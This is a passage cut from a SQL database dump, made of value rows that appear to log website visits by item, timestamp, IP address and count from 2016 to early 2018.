08:00:42','5.248.253.133',23),(3025,1,'2016-04-11 08:00:42','5.248.253.133',1),(3026,1,'2016-04-12 12:15:51','77.75.78.165',30),(3027,1,'2016-04-13 13:13:39','46.118.157.172',12),(3028,1,'2016-04-13 13:13:39','46.118.157.172',1),(3029,1,'2016-04-14 15:14:25','38.99.97.48',33),(3030,1,'2016-04-15 19:30:50','184.154.36.183',28),(3031,1,'2016-04-16 21:47:08','54.209.120.183',28),(3032,1,'2016-04-18 02:17:43','178.137.90.202',9),(3033,1,'2016-04-19 16:38:31','5.248.253.133',43),(3034,1,'2016-04-20 20:51:06','173.73.182.226',8),(3035,1,'2016-04-22 02:56:05','5.248.253.133',30),(3036,1,'2016-04-23 06:27:29','188.166.46.72',5),(3037,1,'2016-04-24 16:01:20','193.242.211.156',25),(3038,1,'2016-04-25 16:07:12','134.249.55.100',29),(3039,1,'2016-04-26 19:03:41','194.58.38.29',13),(3040,1,'2016-04-27 19:39:54','80.240.101.15',28),(3041,1,'2016-04-28 20:23:18','184.154.36.171',12),(3042,1,'2016-04-30 05:55:14','23.81.218.49',15),(3043,1,'2016-05-01 07:32:26','46.118.116.239',26),(3044,1,'2016-05-01 07:32:26','46.118.116.239',1),(3045,1,'2016-05-02 08:57:17','178.137.83.178',19),(3046,1,'2016-05-03 09:43:08','37.115.184.150',13),(3047,1,'2016-05-04 10:50:57','178.137.83.178',21),(3048,1,'2016-05-05 13:44:45','37.115.184.150',13),(3049,1,'2016-05-06 14:26:36','188.143.232.11',23),(3050,1,'2016-05-07 18:13:28','176.31.39.23',21),(3051,1,'2016-05-08 19:13:59','184.154.36.185',9),(3052,1,'2016-05-09 21:14:19','46.118.116.239',18),(3053,1,'2016-05-10 22:54:38','37.115.184.150',31),(3054,1,'2016-05-10 22:54:38','37.115.184.150',1),(3055,1,'2016-05-12 00:14:38','71.179.255.68',16),(3056,1,'2016-05-13 01:02:47','173.252.74.119',75),(3057,1,'2016-05-14 01:16:11','23.81.233.119',23),(3058,1,'2016-05-15 05:13:11','40.77.167.42',11),(3059,1,'2016-05-16 05:57:44','142.4.216.172',8),(3060,1,'2016-05-17 06:58:49','173.252.123.136',11),(3061,1,'2016-05-18 10:10:41','173.252.123.146',15),(3062,1,'2016-05-19 11:27:32','173.252.123.147',4),(3063,1,'2016-05-20 13:10:23','173.252.123.137',12),(3064,1,'2016-05-21 13:12:42','173.252.123.135',17),(3065,1,'2016-05-22 14:21:14','173.252.123.135',6),(3066,1,'2016-05-23 16:25:43','167.114.172.223',139),(3067,1,'2016-05-24 20:23:41','173.252.123.141',5),(3068,1,'2016-05-25 21:43:31','173.252.112.107',9),(3069,1,'2016-05-26 23:55:58','207.46.13.4',13),(3070,1,'2016-05-28 05:58:47','23.106.27.133',12),(3071,1,'2016-05-29 07:55:38','173.252.90.234',5),(3072,1,'2016-05-30 10:28:20','173.252.74.111',64),(3073,1,'2016-05-31 14:10:09','173.252.112.117',21),(3074,1,'2016-06-01 15:22:52','173.252.74.106',25),(3075,1,'2016-06-02 15:32:31','173.252.74.114',11),(3076,1,'2016-06-03 16:40:55','173.252.74.96',11),(3077,1,'2016-06-04 17:00:41','173.252.123.133',7),(3078,1,'2016-06-05 19:24:15','184.154.36.186',9),(3079,1,'2016-06-06 22:45:55','23.105.150.57',14),(3080,1,'2016-06-07 23:19:42','50.19.25.229',9),(3081,1,'2016-06-08 23:25:43','94.199.151.22',7),(3082,1,'2016-06-10 01:09:21','66.249.79.163',12),(3083,1,'2016-06-11 08:57:51','69.58.178.57',9),(3084,1,'2016-06-12 09:53:22','173.252.74.115',94),(3085,1,'2016-06-13 12:23:07','173.252.74.98',8),(3086,1,'2016-06-14 21:02:49','184.154.36.171',9),(3087,1,'2016-06-15 21:35:47','52.40.232.162',9),(3088,1,'2016-06-16 23:44:33','173.252.74.107',35),(3089,1,'2016-06-18 00:15:16','173.252.74.111',75),(3090,1,'2016-06-19 01:24:50','173.252.74.121',83),(3091,1,'2016-06-20 06:15:06','173.252.74.117',24),(3092,1,'2016-06-21 07:08:48','141.8.143.198',9),(3093,1,'2016-06-22 07:59:55','207.46.13.82',71),(3094,1,'2016-06-23 09:25:02','173.252.74.104',10),(3095,1,'2016-06-24 10:28:31','173.252.123.142',19),(3096,1,'2016-06-24 10:28:31','173.252.123.142',1),(3097,1,'2016-06-25 11:07:27','173.252.74.123',8),(3098,1,'2016-06-26 11:44:15','173.252.123.131',14),(3099,1,'2016-06-27 14:41:04','91.121.141.219',8),(3100,1,'2016-06-28 23:34:48','173.252.74.120',17),(3101,1,'2016-06-30 04:04:32','5.79.68.56',10),(3102,1,'2016-07-01 06:36:03','157.55.39.129',9),(3103,1,'2016-07-02 08:15:24','95.47.138.163',10),(3104,1,'2016-07-03 14:43:01','207.46.13.139',9),(3105,1,'2016-07-04 15:23:26','68.180.229.33',4),(3106,1,'2016-07-05 20:50:50','173.252.74.122',106),(3107,1,'2016-07-06 21:39:39','180.76.15.144',6),(3108,1,'2016-07-08 00:28:49','173.252.74.101',5),(3109,1,'2016-07-09 01:22:55','173.252.74.118',8),(3110,1,'2016-07-10 02:38:56','173.252.74.120',11),(3111,1,'2016-07-11 04:03:10','173.252.123.133',48),(3112,1,'2016-07-12 06:36:26','173.252.123.141',14),(3113,1,'2016-07-13 07:47:00','52.32.206.182',17),(3114,1,'2016-07-14 19:23:26','184.154.36.183',10),(3115,1,'2016-07-15 22:30:06','68.134.38.160',6),(3116,1,'2016-07-17 02:52:29','173.252.123.143',9),(3117,1,'2016-07-18 03:21:58','192.95.29.116',7),(3118,1,'2016-07-19 05:12:00','180.76.15.19',10),(3119,1,'2016-07-20 06:40:28','125.165.0.246',11),(3120,1,'2016-07-21 07:17:54','188.143.232.22',8),(3121,1,'2016-07-22 09:20:06','188.143.232.41',9),(3122,1,'2016-07-23 10:00:15','173.252.123.131',12),(3123,1,'2016-07-24 13:36:11','173.252.74.123',6),(3124,1,'2016-07-25 19:06:10','173.252.123.142',11),(3125,1,'2016-07-26 21:47:42','173.252.123.138',8),(3126,1,'2016-07-28 00:28:05','23.82.80.64',15),(3127,1,'2016-07-29 02:20:02','173.252.74.114',12),(3128,1,'2016-07-30 04:39:02','173.252.74.112',4),(3129,1,'2016-07-31 12:34:21','173.252.74.122',12),(3130,1,'2016-08-01 19:04:44','184.154.36.183',11),(3131,1,'2016-08-02 23:29:02','173.252.74.107',5),(3132,1,'2016-08-03 23:34:20','69.63.188.110',12),(3133,1,'2016-08-05 01:48:29','68.180.229.249',5),(3134,1,'2016-08-06 04:07:15','173.252.123.130',135),(3135,1,'2016-08-07 09:01:16','220.181.108.156',5),(3136,1,'2016-08-08 17:18:46','173.252.123.129',101),(3137,1,'2016-08-09 20:11:02','173.252.123.146',5),(3138,1,'2016-08-10 23:08:08','173.252.123.129',6),(3139,1,'2016-08-11 23:43:48','173.252.123.142',12),(3140,1,'2016-08-13 00:15:13','173.252.123.143',11),(3141,1,'2016-08-14 01:47:00','173.252.123.143',9),(3142,1,'2016-08-15 07:11:43','46.105.98.166',12),(3143,1,'2016-08-16 15:25:22','173.252.123.136',14),(3144,1,'2016-08-17 19:11:35','173.252.123.137',7),(3145,1,'2016-08-18 19:15:10','192.95.50.76',45),(3146,1,'2016-08-19 19:27:57','69.63.188.118',139),(3147,1,'2016-08-20 19:28:10','173.252.123.134',347),(3148,1,'2016-08-21 19:28:58','69.63.188.100',158),(3149,1,'2016-08-22 19:49:39','173.252.123.128',162),(3150,1,'2016-08-23 19:57:57','173.252.90.125',176),(3151,1,'2016-08-24 19:59:31','173.252.123.138',178),(3152,1,'2016-08-25 20:08:59','69.63.188.124',121),(3153,1,'2016-08-26 20:30:53','173.252.123.142',126),(3154,1,'2016-08-27 20:34:52','173.252.74.123',186),(3155,1,'2016-08-28 20:38:39','173.252.123.147',237),(3156,1,'2016-08-29 21:11:37','173.252.123.146',168),(3157,1,'2016-08-30 21:36:40','66.220.158.101',190),(3158,1,'2016-08-31 21:42:38','173.252.74.121',119),(3159,1,'2016-09-01 21:53:50','173.252.74.121',171),(3160,1,'2016-09-02 22:00:05','173.252.74.117',341),(3161,1,'2016-09-03 22:01:09','173.252.74.119',248),(3162,1,'2016-09-04 22:06:00','173.252.123.141',386),(3163,1,'2016-09-05 22:08:19','66.220.158.117',107),(3164,1,'2016-09-06 22:52:33','173.252.74.122',19),(3165,1,'2016-09-07 23:56:36','173.252.123.141',24),(3166,1,'2016-09-09 00:28:46','173.252.123.131',16),(3167,1,'2016-09-10 00:30:08','31.13.113.81',30),(3168,1,'2016-09-11 02:47:33','173.252.123.138',38),(3169,1,'2016-09-12 03:13:04','96.244.100.206',51),(3170,1,'2016-09-13 04:22:07','173.252.123.136',30),(3171,1,'2016-09-14 06:26:18','173.252.74.109',33),(3172,1,'2016-09-15 09:45:46','173.252.123.130',46),(3173,1,'2016-09-16 11:34:53','173.252.74.121',44),(3174,1,'2016-09-17 12:01:51','173.252.74.122',54),(3175,1,'2016-09-18 12:12:08','173.252.123.141',46),(3176,1,'2016-09-19 12:48:52','66.220.158.101',21),(3177,1,'2016-09-20 14:00:00','69.63.188.127',80),(3178,1,'2016-09-21 14:25:33','173.252.74.108',59),(3179,1,'2016-09-22 15:30:34','173.252.123.131',88),(3180,1,'2016-09-23 16:02:07','173.252.123.128',40),(3181,1,'2016-09-24 16:27:38','173.252.74.96',30),(3182,1,'2016-09-25 19:01:11','173.252.123.130',43),(3183,1,'2016-09-26 19:01:14','173.252.123.131',61),(3184,1,'2016-09-27 19:05:13','159.45.22.8',60),(3185,1,'2016-09-28 20:00:06','173.252.74.108',49),(3186,1,'2016-09-29 20:24:46','204.126.132.241',61),(3187,1,'2016-09-30 20:30:50','173.252.123.143',231),(3188,1,'2016-10-01 22:20:52','173.252.123.133',154),(3189,1,'2016-10-02 22:51:04','173.252.74.110',45),(3190,1,'2016-10-03 23:40:05','173.252.74.103',51),(3191,1,'2016-10-04 23:51:44','173.252.74.112',94),(3192,1,'2016-10-06 00:10:51','31.13.113.86',60),(3193,1,'2016-10-07 00:14:43','31.13.113.77',268),(3194,1,'2016-10-08 00:51:47','173.252.123.138',188),(3195,1,'2016-10-09 01:25:42','69.63.188.121',42),(3196,1,'2016-10-10 01:34:23','69.63.188.119',47),(3197,1,'2016-10-11 02:10:26','69.63.188.109',44),(3198,1,'2016-10-12 02:31:57','173.252.123.128',39),(3199,1,'2016-10-13 03:31:15','173.252.123.144',37),(3200,1,'2016-10-14 08:34:22','173.252.123.133',64),(3201,1,'2016-10-15 10:21:47','69.63.188.122',57),(3202,1,'2016-10-16 10:54:56','66.220.156.119',190),(3203,1,'2016-10-17 10:57:06','69.63.188.125',106),(3204,1,'2016-10-18 10:58:36','69.63.188.111',61),(3205,1,'2016-10-19 12:22:10','66.220.156.122',65),(3206,1,'2016-10-20 18:45:49','96.244.79.17',5),(3207,1,'2016-10-21 19:05:21','184.154.36.185',3),(3208,1,'2016-10-22 23:12:12','157.55.39.134',8),(3209,1,'2016-10-23 23:22:49','46.118.155.22',7),(3210,1,'2016-10-24 23:32:23','40.77.167.8',6),(3211,1,'2016-10-26 00:14:05','40.77.167.74',3),(3212,1,'2016-10-27 00:31:10','123.125.71.116',5),(3213,1,'2016-10-28 16:01:04','199.129.146.242',5),(3214,1,'2016-10-29 19:10:12','184.154.36.171',2),(3215,1,'2016-10-30 20:08:43','66.249.79.156',3),(3216,1,'2016-11-01 01:09:34','23.80.141.200',2),(3217,1,'2016-11-02 05:17:34','71.166.46.56',10),(3218,1,'2016-11-03 22:24:25','180.76.15.27',4),(3219,1,'2016-11-05 19:25:20','208.184.134.166',6),(3220,1,'2016-11-06 20:02:34','184.154.36.183',10),(3221,1,'2016-11-07 20:12:46','184.154.36.171',4),(3222,1,'2016-11-08 20:18:13','173.44.37.250',4),(3223,1,'2016-11-10 08:13:37','68.180.230.236',2),(3224,1,'2016-11-11 09:00:18','69.58.178.59',8),(3225,1,'2016-11-12 15:48:06','207.46.13.84',2),(3226,1,'2016-11-13 21:02:17','77.75.79.95',5),(3227,1,'2016-11-15 20:08:15','184.154.36.183',8),(3228,1,'2016-11-16 21:25:21','8.21.241.69',4),(3229,1,'2016-11-17 23:03:38','40.77.167.63',10),(3230,1,'2016-11-19 15:45:34','73.132.243.51',4),(3231,1,'2016-11-20 17:02:58','64.79.100.46',8),(3232,1,'2016-11-21 18:21:27','78.158.11.226',2),(3233,1,'2016-11-23 02:24:11','108.48.99.161',1),(3234,1,'2016-11-24 17:08:45','167.114.234.184',3),(3235,1,'2016-11-26 04:24:19','77.75.78.171',2),(3236,1,'2016-11-28 00:58:29','123.125.71.86',6),(3237,1,'2016-11-29 07:49:56','66.249.65.156',4),(3238,1,'2016-11-30 21:28:55','217.69.133.233',9),(3239,1,'2016-12-01 22:01:26','220.181.108.170',2),(3240,1,'2016-12-02 22:32:33','207.46.13.50',12),(3241,1,'2016-12-03 23:38:17','188.143.232.37',4),(3242,1,'2016-12-05 04:17:53','37.187.56.66',6),(3243,1,'2016-12-06 13:00:57','180.76.15.149',8),(3244,1,'2016-12-07 17:08:31','166.216.165.130',8),(3245,1,'2016-12-08 21:10:47','40.77.167.0',8),(3246,1,'2016-12-11 10:02:19','69.58.178.57',7),(3247,1,'2016-12-12 20:05:17','184.154.36.171',3),(3248,1,'2016-12-14 03:49:31','23.106.27.60',2),(3249,1,'2016-12-16 03:51:40','98.95.178.81',3),(3250,1,'2016-12-17 09:33:57','88.198.16.12',5),(3251,1,'2016-12-18 20:11:38','184.154.36.183',7),(3252,1,'2016-12-19 23:22:10','207.46.13.188',6),(3253,1,'2016-12-21 04:20:54','157.55.39.2',2),(3254,1,'2016-12-22 15:52:51','162.99.225.38',7),(3255,1,'2016-12-24 15:33:39','157.55.39.2',3),(3256,1,'2016-12-25 19:40:43','35.161.215.162',6),(3257,1,'2016-12-26 20:01:05','184.154.36.171',2),(3258,1,'2016-12-27 20:04:08','184.154.36.184',7),(3259,1,'2016-12-29 05:42:17','66.249.79.75',12),(3260,1,'2016-12-30 05:53:12','37.16.72.123',11),(3261,1,'2016-12-31 12:32:17','45.55.163.168',8),(3262,1,'2017-01-02 01:44:50','23.82.186.244',6),(3263,1,'2017-01-03 17:35:54','173.252.124.237',10),(3264,1,'2017-01-04 18:13:26','172.56.2.163',3),(3265,1,'2017-01-05 23:58:10','148.251.54.44',9),(3266,1,'2017-01-07 03:59:59','71.58.29.30',3),(3267,1,'2017-01-08 18:52:08','188.143.232.37',5),(3268,1,'2017-01-09 19:17:04','214.36.0.135',8),(3269,1,'2017-01-10 20:07:13','184.154.36.186',10),(3270,1,'2017-01-12 07:59:36','188.143.232.72',2),(3271,1,'2017-01-13 08:20:11','31.148.246.165',6),(3272,1,'2017-01-15 01:51:54','69.137.40.126',4),(3273,6,'2017-08-10 06:28:55','34.209.182.200',3),(3274,6,'2017-08-11 11:34:07','153.31.113.21',5),(3275,6,'2017-09-13 14:56:07','69.30.198.178',2),(3276,7,'2017-09-13 16:00:51','100.16.184.25',8),(3277,7,'2017-09-14 17:39:45','217.69.133.227',3),(3278,6,'2017-09-14 22:50:16','157.55.39.69',1),(3279,7,'2017-09-16 04:36:04','174.107.174.186',5),(3280,6,'2017-09-16 16:07:13','195.154.243.51',2),(3281,7,'2017-09-17 19:16:42','184.154.36.171',3),(3282,7,'2017-09-18 19:49:35','204.79.180.21',2),(3283,6,'2017-09-19 15:35:24','144.217.76.194',3),(3284,7,'2017-09-19 19:55:40','158.69.26.144',1),(3285,7,'2017-09-21 22:01:18','5.9.63.162',3),(3286,6,'2017-09-22 17:23:48','93.158.161.26',4),(3287,7,'2017-09-23 02:34:44','216.244.66.235',6),(3288,8,'2017-09-23 12:33:18','104.196.142.132',3),(3289,6,'2017-09-24 13:18:53','66.249.79.69',2),(3290,8,'2017-09-24 19:50:54','5.189.166.23',3),(3291,7,'2017-09-25 04:01:04','66.249.79.70',6),(3292,6,'2017-09-25 19:25:13','220.181.108.103',2),(3293,8,'2017-09-25 19:58:33','220.181.108.107',4),(3294,6,'2017-09-26 19:48:47','204.126.132.241',5),(3295,8,'2017-09-26 20:12:06','73.213.22.160',5),(3296,7,'2017-09-26 20:12:46','73.213.22.160',3),(3297,7,'2017-09-28 05:24:19','141.8.143.180',1),(3298,6,'2017-09-29 00:11:58','80.241.214.124',1),(3299,8,'2017-09-29 10:08:46','38.76.78.127',1),(3300,7,'2017-09-30 11:54:19','174.205.3.250',2),(3301,6,'2017-09-30 21:17:34','216.244.66.235',3),(3302,7,'2017-10-01 23:32:09','106.120.173.99',2),(3303,6,'2017-10-02 02:35:12','91.137.16.153',6),(3304,8,'2017-10-02 14:58:31','213.239.205.118',4),(3305,6,'2017-10-03 06:40:05','54.245.1.61',3),(3306,7,'2017-10-03 06:40:12','54.245.1.61',4),(3307,6,'2017-10-04 13:53:00','73.128.243.51',4),(3308,8,'2017-10-04 13:56:04','73.128.243.51',5),(3309,7,'2017-10-04 22:54:55','139.162.167.155',4),(3310,6,'2017-10-05 15:29:14','78.46.174.55',3),(3311,8,'2017-10-05 15:29:18','78.46.174.55',2),(3312,7,'2017-10-06 19:31:12','104.131.108.114',3),(3313,6,'2017-10-06 19:31:27','104.131.108.114',2),(3314,8,'2017-10-06 19:33:46','104.131.108.114',2),(3315,6,'2017-10-08 04:00:07','173.212.196.147',3),(3316,7,'2017-10-08 08:41:15','77.75.76.166',5),(3317,8,'2017-10-09 02:30:30','159.203.169.43',5),(3318,6,'2017-10-09 07:23:49','194.58.119.70',2),(3319,7,'2017-10-09 11:48:49','106.120.173.99',2),(3320,8,'2017-10-11 08:11:23','38.102.18.17',3),(3321,7,'2017-10-11 08:43:27','77.75.79.72',5),(3322,6,'2017-10-11 11:44:47','213.133.111.165',4),(3323,8,'2017-10-12 08:19:39','82.80.249.192',2),(3324,6,'2017-10-13 11:48:23','146.185.223.25',3),(3325,8,'2017-10-13 11:48:27','146.185.223.25',2),(3326,7,'2017-10-13 11:48:42','146.185.223.25',1),(3327,6,'2017-10-15 03:37:10','138.197.64.76',3),(3328,8,'2017-10-15 03:37:13','138.197.64.76',3),(3329,7,'2017-10-15 03:37:15','138.197.64.76',3),(3330,6,'2017-10-16 20:16:35','192.99.67.13',3),(3331,8,'2017-10-16 20:16:41','192.99.67.13',2),(3332,7,'2017-10-16 20:17:08','192.99.67.13',3),(3333,6,'2017-10-18 01:51:44','71.244.137.250',1),(3334,7,'2017-10-20 11:27:56','192.99.150.97',1),(3335,6,'2017-10-20 13:57:56','144.76.12.66',3),(3336,6,'2017-10-21 16:14:03','173.255.233.124',2),(3337,8,'2017-10-21 16:14:07','173.255.233.124',1),(3338,6,'2017-10-23 03:19:37','188.165.233.34',10),(3339,8,'2017-10-23 03:19:41','188.165.233.34',1),(3340,7,'2017-10-23 03:20:00','188.165.233.34',10),(3341,7,'2017-10-24 04:32:25','66.249.65.98',10),(3342,7,'2017-10-25 05:14:58','66.249.79.88',6),(3343,6,'2017-10-25 08:45:09','141.8.143.143',4),(3344,8,'2017-10-25 08:46:04','141.8.143.143',7),(3345,6,'2017-10-26 10:26:45','141.8.143.143',6),(3346,8,'2017-10-26 14:27:22','220.181.108.105',3),(3347,7,'2017-10-26 16:09:25','100.43.91.101',3),(3348,7,'2017-10-27 18:50:49','207.46.13.65',6),(3349,6,'2017-10-28 03:48:40','66.249.79.68',4),(3350,8,'2017-10-28 08:55:28','38.109.205.237',4),(3351,7,'2017-10-29 03:40:28','159.203.112.166',3),(3352,6,'2017-10-30 01:18:39','5.9.80.133',1),(3353,8,'2017-10-30 23:06:37','180.76.15.19',1),(3354,6,'2017-10-31 01:24:03','100.36.90.41',6),(3355,7,'2017-10-31 01:31:30','100.36.90.41',11),(3356,6,'2017-11-01 07:51:31','104.131.190.117',3),(3357,8,'2017-11-01 07:51:31','104.131.190.117',4),(3358,7,'2017-11-01 07:51:38','104.131.190.117',3),(3359,8,'2017-11-03 18:54:04','141.8.143.143',2),(3360,6,'2017-11-03 23:38:36','141.8.143.143',2),(3361,7,'2017-11-04 00:19:15','67.237.32.213',2),(3362,7,'2017-11-05 01:45:54','77.75.78.166',4),(3363,6,'2017-11-05 09:13:08','157.55.39.200',5),(3364,8,'2017-11-06 03:12:11','180.76.15.11',5),(3365,7,'2017-11-06 03:53:24','77.75.78.163',5),(3366,6,'2017-11-06 20:11:33','184.154.36.171',5),(3367,7,'2017-11-07 10:34:56','88.198.54.49',3),(3368,6,'2017-11-07 23:10:44','69.58.178.58',5),(3369,8,'2017-11-07 23:10:49','69.58.178.58',1),(3370,7,'2017-11-08 18:50:16','66.249.79.72',5),(3371,8,'2017-11-09 00:29:55','141.8.143.143',2),(3372,6,'2017-11-09 07:52:37','141.8.143.139',5),(3373,6,'2017-11-10 10:17:24','98.204.18.165',3),(3374,7,'2017-11-10 15:35:49','213.239.205.118',2),(3375,8,'2017-11-11 00:07:35','180.76.15.11',2),(3376,6,'2017-11-11 12:54:41','66.249.79.68',5),(3377,7,'2017-11-11 16:07:10','158.69.116.77',3),(3378,6,'2017-11-12 20:05:10','184.154.36.183',3),(3379,7,'2017-11-13 03:22:33','141.8.143.143',3),(3380,8,'2017-11-13 09:45:44','220.181.108.112',2),(3381,6,'2017-11-14 10:33:52','180.76.15.32',5),(3382,8,'2017-11-15 08:15:51','38.100.114.51',2),(3383,7,'2017-11-15 14:02:02','153.31.113.20',3),(3384,6,'2017-11-15 20:06:52','184.154.36.171',5),(3385,7,'2017-11-17 11:59:33','77.75.79.109',2),(3386,6,'2017-11-17 15:55:51','82.193.102.149',3),(3387,8,'2017-11-18 03:51:24','157.55.39.109',1),(3388,7,'2017-11-18 19:50:13','207.46.13.87',4),(3389,6,'2017-11-18 20:03:10','184.154.36.186',2),(3390,6,'2017-11-19 20:06:58','184.154.36.183',5),(3391,8,'2017-11-19 23:58:26','220.181.108.173',2),(3392,7,'2017-11-20 08:39:42','66.249.79.74',3),(3393,6,'2017-11-20 22:35:53','96.234.147.182',4),(3394,6,'2017-11-22 20:02:11','184.154.36.185',5),(3395,7,'2017-11-23 09:40:06','77.75.76.165',1),(3396,6,'2017-11-23 20:11:01','184.154.36.186',2),(3397,8,'2017-11-24 12:58:24','100.43.91.101',1),(3398,6,'2017-11-24 23:45:12','100.16.228.103',5),(3399,7,'2017-11-25 05:12:22','77.75.79.17',3),(3400,8,'2017-11-25 18:19:30','100.16.228.103',1),(3401,6,'2017-11-26 20:07:36','184.154.36.184',4),(3402,8,'2017-11-27 02:03:38','71.121.233.203',3),(3403,6,'2017-11-27 20:11:48','184.154.36.183',7),(3404,8,'2017-11-28 14:18:31','38.109.207.12',5),(3405,6,'2017-11-29 12:25:25','13.57.47.188',4),(3406,7,'2017-11-29 19:04:41','141.8.143.143',2),(3407,8,'2017-11-29 20:11:49','146.71.23.106',6),(3408,6,'2017-11-30 13:26:35','112.243.123.199',4),(3409,8,'2017-12-01 10:45:11','69.58.178.59',3),(3410,7,'2017-12-01 10:45:24','69.58.178.59',3),(3411,6,'2017-12-01 16:10:20','174.127.133.60',2),(3412,6,'2017-12-02 20:02:47','184.154.36.184',4),(3413,8,'2017-12-03 03:50:17','70.174.40.102',1),(3414,6,'2017-12-03 20:09:47','184.154.36.186',13),(3415,7,'2017-12-04 03:43:13','77.75.79.17',2),(3416,8,'2017-12-04 04:14:25','188.165.233.228',2),(3417,6,'2017-12-05 16:01:20','34.209.175.187',7),(3418,8,'2017-12-06 00:35:49','172.58.185.190',3),(3419,6,'2017-12-06 18:56:14','68.134.9.53',6),(3420,7,'2017-12-07 02:01:58','77.75.78.160',1),(3421,6,'2017-12-07 20:02:29','184.154.36.184',1),(3422,6,'2017-12-08 20:21:33','208.87.234.180',3),(3423,8,'2017-12-08 20:23:43','208.87.234.180',1),(3424,7,'2017-12-08 23:11:05','106.120.173.99',2),(3425,6,'2017-12-09 20:41:18','108.3.163.177',3),(3426,8,'2017-12-09 22:05:46','159.203.123.52',4),(3427,7,'2017-12-10 03:27:46','71.121.244.120',2),(3428,6,'2017-12-11 07:13:07','79.143.185.25',3),(3429,7,'2017-12-11 10:49:53','77.75.79.72',1),(3430,8,'2017-12-12 13:31:44','141.8.143.143',1),(3431,7,'2017-12-12 13:31:48','5.255.250.27',1),(3432,6,'2017-12-12 15:26:40','50.225.39.86',8),(3433,7,'2017-12-13 18:41:36','5.255.250.27',2),(3434,6,'2017-12-13 20:01:30','184.154.36.185',1),(3435,6,'2017-12-14 20:07:43','184.154.36.186',7),(3436,8,'2017-12-14 22:30:55','73.172.62.63',4),(3437,7,'2017-12-15 05:47:37','94.199.151.22',1),(3438,6,'2017-12-15 20:11:58','184.154.36.184',2),(3439,8,'2017-12-16 07:29:37','91.137.19.242',4),(3440,7,'2017-12-16 12:27:31','69.143.35.179',4),(3441,6,'2017-12-16 20:12:00','184.154.36.185',2),(3442,6,'2017-12-18 00:52:20','96.234.147.182',4),(3443,8,'2017-12-18 06:04:00','37.187.56.81',2),(3444,7,'2017-12-18 06:04:22','37.187.56.81',6),(3445,8,'2017-12-19 08:06:52','38.77.210.57',1),(3446,6,'2017-12-19 20:12:07','184.154.36.184',6),(3447,7,'2017-12-20 17:09:08','180.76.15.31',4),(3448,8,'2017-12-20 18:31:59','73.200.184.133',3),(3449,6,'2017-12-20 22:35:26','50.225.39.69',7),(3450,8,'2017-12-21 23:21:40','71.121.235.184',1),(3451,6,'2017-12-22 05:39:08','148.251.190.210',3),(3452,6,'2017-12-23 13:33:11','78.46.174.55',3),(3453,8,'2017-12-23 13:33:16','78.46.174.55',3),(3454,7,'2017-12-23 13:33:37','78.46.174.55',2),(3455,6,'2017-12-24 14:14:10','81.209.177.136',2),(3456,7,'2017-12-24 14:14:51','81.209.177.136',2),(3457,8,'2017-12-24 14:39:34','81.209.177.189',1),(3458,8,'2017-12-25 19:00:49','5.102.173.71',4),(3459,6,'2017-12-25 20:04:01','184.154.36.183',5),(3460,7,'2017-12-26 10:47:09','138.197.64.72',2),(3461,6,'2017-12-26 20:24:23','184.154.36.183',1),(3462,6,'2018-01-07 18:18:54','174.205.5.190',7),(3463,7,'2018-01-07 21:31:00','66.249.79.74',14),(3464,8,'2018-01-08 15:59:15','69.58.178.59',3),(3465,6,'2018-01-08 21:03:41','66.249.79.72',6),(3466,7,'2018-01-09 00:32:12','66.249.79.72',12),(3467,8,'2018-01-09 20:35:34','50.225.39.85',4),(3468,6,'2018-01-10 00:34:01','50.201.151.83',4),(3469,6,'2018-01-11 01:06:03','96.244.204.170',6),(3470,7,'2018-01-11 01:52:05','40.77.167.170',2),(3471,8,'2018-01-11 17:28:41','66.249.79.74',1),(3472,6,'2018-01-12 01:11:16','96.244.204.170',6),(3473,7,'2018-01-12 18:33:54','77.75.78.162',3),(3474,6,'2018-01-13 04:02:52','96.234.147.87',6),(3475,8,'2018-01-13 04:30:46','141.8.143.143',2),(3476,7,'2018-01-14 01:01:08','40.77.167.29',1),(3477,8,'2018-01-14 16:34:28','207.46.13.167',1),(3478,6,'2018-01-15 13:01:33','216.244.66.198',4),(3479,8,'2018-01-15 21:59:05','73.129.22.251',3),(3480,7,'2018-01-15 22:48:26','194.58.119.70',7),(3481,6,'2018-01-16 13:38:08','50.225.39.88',8),(3482,8,'2018-01-17 08:30:09','104.192.74.41',5),(3483,7,'2018-01-17 08:30:18','104.192.74.41',5),(3484,6,'2018-01-17 13:50:44','166.91.10.210',10),(3485,7,'2018-01-18 09:29:31','157.55.39.141',3),(3486,6,'2018-01-18 13:58:58','216.244.66.198',9),(3487,8,'2018-01-19 04:40:32','98.166.217.224',2),(3488,7,'2018-01-19 09:38:48','77.75.78.162',3),(3489,6,'2018-01-19 17:01:38','68.134.39.60',5),(3490,7,'2018-01-20 16:58:45','173.192.95.98',3),(3491,8,'2018-01-20 16:58:47','50.97.137.43',3),(3492,6,'2018-01-20 17:04:51','107.77.202.23',5),(3493,8,'2018-01-21 19:52:56','77.75.79.95',4),(3494,7,'2018-01-21 20:01:12','184.154.36.184',3),(3495,6,'2018-01-21 21:43:52','216.244.66.198',4),(3496,8,'2018-01-23 02:33:50','223.29.42.208',3),(3497,6,'2018-01-23 17:33:46','178.151.245.174',6),(3498,7,'2018-01-24 21:42:36','106.120.173.99',2),(3499,8,'2018-01-24 23:07:02','66.249.79.72',4),(3500,6,'2018-01-25 04:04:30','73.173.254.31',4),(3501,7,'2018-01-26 01:10:26','40.77.167.101',4),(3502,6,'2018-01-26 13:19:17','50.225.39.88',5),(3503,8,'2018-01-27 01:35:24','157.55.39.223',1),(3504,6,'2018-01-27 23:08:04','184.169.45.4',3),(3505,7,'2018-01-28 08:56:41','45.55.215.87',4),(3506,8,'2018-01-28 08:57:52','45.55.215.87',5),(3507,6,'2018-01-29 00:12:55','71.121.235.184',4),(3508,8,'2018-01-29 13:39:20','107.77.204.210',5),(3509,6,'2018-01-30 01:04:36','40.77.167.82',4),(3510,7,'2018-01-30 01:04:52','157.55.39.234',1),(3511,6,'2018-01-31 01:15:45','71.121.203.114',5),(3512,8,'2018-01-31 04:13:39','77.75.76.170',4),(3513,6,'2018-02-01 12:37:24','50.225.39.69',6),(3514,8,'2018-02-01 12:37:28','50.225.39.69',4),(3515,7,'2018-02-01 18:39:37','140.205.205.25',4),(3516,6,'2018-02-02 13:15:08','69.58.178.58',2),(3517,8,'2018-02-02 13:15:11','69.58.178.58',1),(3518,7,'2018-02-03 16:10:21','45.55.220.16',4),(3519,6,'2018-02-03 16:10:52','45.55.220.16',2),(3520,8,'2018-02-03 16:11:36','45.55.220.16',5),(3521,8,'2018-02-04 16:51:48','157.55.39.238',5),(3522,6,'2018-02-04 18:16:59','96.244.204.170',10),(3523,7,'2018-02-05 15:07:48','66.249.79.72',3),(3524,8,'2018-02-05 